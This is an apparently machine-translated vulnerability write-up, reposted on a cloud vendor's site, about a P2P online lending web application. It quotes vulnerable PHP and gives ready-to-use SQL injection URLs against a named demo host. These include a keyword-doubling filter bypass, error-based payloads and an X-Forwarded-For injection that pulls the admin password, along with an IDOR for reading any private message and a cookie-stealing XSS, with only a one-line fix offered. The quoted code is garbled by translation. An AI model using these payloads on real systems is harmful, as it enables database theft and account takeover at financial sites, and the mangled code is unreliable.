Home > Cloud Computing > Cloud Security

SQL Injection/unauthorized access/xss (demo successful) in p2p online lending system)

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

SQL Injection/unauthorized access/xss (demo successful) in p2p online lending system)

Only one home page is required.
There are still safe dogs. But it is useless.

Inject 1 (test failed)

See the code core \ deayou. core. php 65-86.
 

elseif ($_G['query_site'] == 'home') {$user_id = $_REQUEST['user_id'];if ($user_id == '') {$user_id = $_G['user_id'];}$_G['article_id'] = $user_id;$magic->assign('_G', $_G);usersClass::AddVisit(array('user_id' => $user_id, 'visit_userid' => $_G['user_id']));if ($home_dir != '') {$magic->template_dir = $home_dir;$magic->assign('tpldir', '/' . $home_dir);$magic->display($home_template);}else {$magic->display('home.html');}die;}


Then move on closer
 

/*** Recent visit * @ param $ param array ('user _ id' => 'Member id ') * @ return bool true/false */public static function AddVisit ($ data = array () {global $ mysql; if (isset ($ data ['visit _ userid']) & $ data ['visit _ userid']! = "" & $ Data ['user _ id']! = $ Data ['visit _ userid']) {$ time = time (); $ ip = ip_address (); $ SQL = "select id from '{users_visit}' where user_id = {$ data ['user _ id']} and visit_userid = {$ data ['visit _ userid']} "; $ result = $ mysql-> db_fetch_array ($ SQL); // you can specify if ($ result! = False) {$ SQL = "Update' {users_visit} 'set addtime = '{$ time }', addip = '{$ ip}' where id = '{$ result ['id']}' "; $ mysql-> db_query ($ SQL );} else {$ SQL = "insert into '{users_visit} 'set user_id =' {$ data ['user _ id']} ', visit_userid = '{$ data ['visit _ userid']}', addtime = '{$ time}', addip = '{$ ip }'"; $ mysql-> db_query ($ SQL);} // if there are more than 10 records, delete the earliest $ SQL = "select count (1) as num from '{users_visit}' where user_id = {$ data ['user _ id']} "; $ result = $ mysql-> db_fetch_array ($ SQL ); if ($ result ['num']> 20) {$ SQL = "select id from '{users_visit}' where user_id = {$ data ['user _ id']} order by addtime asc "; $ result = $ mysql-> db_fetch_array ($ SQL); $ SQL = "delete from '{users_visit}' where id = '{$ result ['id']}'"; $ mysql-> db_query ($ SQL );}}}


User_id is not enclosed in single quotes, which causes injection.


Then there is a global filter function.
 

function inject_check($sql_str) {$sql = array('select', 'insert', '\\\'', '\\/\\*', '\\.\\.\\/', '\\.\\/', 'union', 'into', 'load_file', 'outfile');$sql_re = array('', '', '', '', '', '', '', '', '', '', '', '');return str_replace($sql, $sql_re, $sql_str);}



Write twice to bypass. Then the dongle becomes invalid.


 

http://demo2.tuanshang.net/?home&user_id=updatexml(1,concat(1,(seselectlect+database())),1)


 






Injection 2


Modules/message. inc. php
 

Elseif ($ _ U ['query _ type'] = "senteds") {if (isset ($ _ POST ['type']) & $ _ POST ['type'] = 2) {$ data ['id'] = $ _ POST ['id']; $ data ['ent _ user'] = $ _ G ['user _ id']; $ data ['sented'] = 0; $ result = messageClass :: update ($ data); if ($ result! = True) {$ msg = array ($ MsgInfo [$ result], "", $ _ U ['query _ url']);} else {$ msg = array ("operation successful") ;}} else {/* $ data ['sent _ user'] =$ _ G ['user _ id']; $ data ['page'] = $ _ U ['page']; $ data ['epage'] = $ _ U ['epage']; $ data ['sented'] = 1; $ result = messageClass: GetList ($ data); if (is_array ($ result )) {$ pages-> set_data ($ result); $ _ U ['message _ list'] = $ result ['LIST']; $ _ U ['show _ page'] = $ pages-> show (3);} else {$ msg = array ($ result ,"" , $ _ U ['query _ url']);} */if (isset ($ _ REQUEST ['id']) {$ data ['id'] = $ _ REQUEST ['id']; $ data ['user _ id'] = $ _ G ['user _ id']; $ result = messageClass: DeleteMessageReceive ($ data); if ($ result> 0) {$ msg = array ("deleted successfully ","","/? User & q = code/message ");} else {$ msg = array ($ MsgInfo [$ result]);} else {$ msg = array ("Please select and operate ");}}}



Then follow up with the DeleteMessageReceive Function
 

function DeleteMessageReceive($data = array()){global $mysql;if (!IsExiest($data['id'])) return "message_receive_id_empty";if (is_array($data['id'])){$data['id'] = join(",",$data['id']);}$_sql = " where id in ({$data['id']})";if (isset($data['user_id']) && $data['user_id']!=""){$_result = self::GetMessageReceiveOne($data);$_sql .= " and user_id='{$data['user_id']}' and type='user'";$sql = "delete from `{message_receive}` {$_sql}";$mysql -> db_query($sql);if ($_result['type']!='user'){$sql = "delete from `{message_receive}` where user_id='{$data['user_id']}' and receive_value='{$data['id']}'";$mysql -> db_query($sql);}return $data['user_id'];}else{$sql = "delete from `{message_receive}` {$_sql}";$mysql -> db_query($sql);}return $data['id'];}


You can see that $ id can be injected.

http://demo2.tuanshang.net/?user&q=code/message/sentdeledid%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1


Modules/message. inc. php
 

Elseif ($ _ U ['query _ type'] = "sentdeled") {if (isset ($ _ REQUEST ['id']) {$ data ['id'] = $ _ REQUEST ['id']; $ data ['user _ id'] = $ _ G ['user _ id']; $ result = messageClass: DeleteMessage ($ data); if ($ result> 0) {$ msg = array ($ MsgInfo ["message_action_success"], "", "/? User & q = code/message/sented ");} else {$ msg = array ($ MsgInfo [$ result]);} else {$ msg = array ("Please select and operate ");}}


Follow up

function DeleteMessage($data = array()){global $mysql;if (!IsExiest($data['id'])) return "message_id_empty";if (is_array($data['id'])){$data['id'] = join(",",$data['id']);}$_sql = " where id in ({$data['id']})";if (isset($data['user_id']) && $data['user_id']!=""){$_sql .= " and user_id='{$data['user_id']}' ";}$sql = "delete from `{message}` {$_sql}";$mysql -> db_query($sql);return 1;}


Then the id can be injected.
 

http://demo2.tuanshang.net/?user&q=code/message/sentedsid%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1

 


Injection 3
 

function ip_address() {if(!empty($_SERVER["HTTP_CLIENT_IP"])) {$ip_address = $_SERVER["HTTP_CLIENT_IP"];}else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"])){$ip_address = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));}else if(!empty($_SERVER["REMOTE_ADDR"])){$ip_address = $_SERVER["REMOTE_ADDR"];}else{$ip_address = '';}return $ip_address;}



Then

Public static function AddVisit ($ data = array () {global $ mysql; if (isset ($ data ['visit _ userid']) & $ data ['visit _ userid']! = "" & $ Data ['user _ id']! = $ Data ['visit _ userid']) {$ time = time (); $ ip = ip_address (); $ SQL = "select id from '{users_visit}' where user_id = {$ data ['user _ id']} and visit_userid = {$ data ['visit _ userid']} "; $ result = $ mysql-> db_fetch_array ($ SQL); // you can specify if ($ result! = False) {$ SQL = "Update' {users_visit} 'set addtime = '{$ time }', addip = '{$ ip}' where id = '{$ result ['id']}' "; $ mysql-> db_query ($ SQL );} else {$ SQL = "insert into '{users_visit} 'set user_id =' {$ data ['user _ id']} ', visit_userid = '{$ data ['visit _ userid']}', addtime = '{$ time}', addip = '{$ ip }'"; $ mysql-> db_query ($ SQL);} // if there are more than 10 records, delete the earliest $ SQL = "select count (1) as num from '{users_visit}' where user_id = {$ data ['user _ id']} "; $ result = $ mysql-> db_fetch_array ($ SQL ); if ($ result ['num']> 20) {$ SQL = "select id from '{users_visit}' where user_id = {$ data ['user _ id']} order by addtime asc "; $ result = $ mysql-> db_fetch_array ($ SQL); $ SQL = "delete from '{users_visit}' where id = '{$ result ['id']}'"; $ mysql-> db_query ($ SQL );}}}



Injection exists here

Set X-FORWARED-FOR

xxx' or EXP(~(select * from (select password from tuanshang_users_admin limit 1)a)) or '


Injection 5

http://demo2.tuanshang.net/?user&q=code/message/sent

When sending information
 


Unauthorized access

Read any insite email

http://demo2.tuanshang.net/?user&q=code/message/viewed&id=1

Here, you can change the id value.


Xss


Xss exists in the sender's private message. A simple fuzz. Then, the filter is bypassed.


Construct in content
 

 


Cookie retrieved
 

 

 

 

 

 

 

Solution: 

Filter + escape.
 


                

                    
This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or
reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or
complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

                

            


                                                                    

        

            

                

                                        

                        

                    

                

                

    

                    
Contact Us

            
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
                products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
                content of the page makes you feel confusing, please write us an email, we will handle the problem
                within 5 days after receiving your email.

            

                If you find any instances of plagiarism from the community, please send an email to:
                info-contact@alibabacloud.com
                and provide relevant evidence. A staff member will contact you within 5 working days.
            

            



                

                

            

        

    

    


    


  

    

      

        

          

            

              
A Free Trial That Lets You Build Big!

              
 Start building with 50+ products and up to 12 months usage for Elastic Compute Service 

              

                Get Started for Free
              

            

          

          

            

              
    
                
  • 
                  
    Sales Support
    
                  
    
                    1 on 1 presale consultation
                  
    
                  
    
                    Chat
                    Contact Sales
                  
    
                
    • 
                
  • 
                  
    After-Sales Support
    
                  
    
                    24/7 Technical Support
                    6 Free Tickets per Quarter
                    Faster Response
                  
    
                  
    
                    Open a Ticket
                  
    
                
    • 
                
  • 
                  
    
                  
     Alibaba Cloud offers highly flexible support services tailored to meet your exact needs. 
    
                  
    
                    Learn More
                  
    
                
    •